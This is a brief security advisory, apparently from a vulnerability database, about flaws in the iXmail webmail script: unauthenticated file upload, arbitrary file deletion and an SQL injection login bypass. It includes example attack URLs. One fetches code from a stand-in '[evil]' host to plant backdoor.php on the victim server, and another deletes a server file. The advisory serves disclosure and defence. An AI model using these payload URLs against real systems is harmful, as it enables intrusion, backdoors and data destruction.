Description:
Multiple vulnerabilities have been reported in iXmail, which can be exploited by malicious people to bypass user authentication and upload and delete files on a vulnerable system.

Anyone can access the file "ixmail_attach.php" and upload arbitrary files to the "/tmp" directory on the server.

Example copying a malicious file to "http://[victim]/tmp/backdoor.php":
http://[victim]/ixmail_attach.php?submit=1&attach1=http://[evil]/badcode.txt&attach1_name=backdoor.php

A vulnerability in "ixmail_netattach.php" can also be exploited to delete arbitrary files on the system using the privileges of the web server.

Example deleting "ixmail_netattach.php":
http://[victim]/ixmail_netattach.php?file=ixmail_netattach.php

A malicious person can also exploit a vulnerability in "index.php" to bypass user authentication by using classical SQL injection attacks. However, this requires that the PHP setting "magic_quotes_gpc" has been set to "OFF".
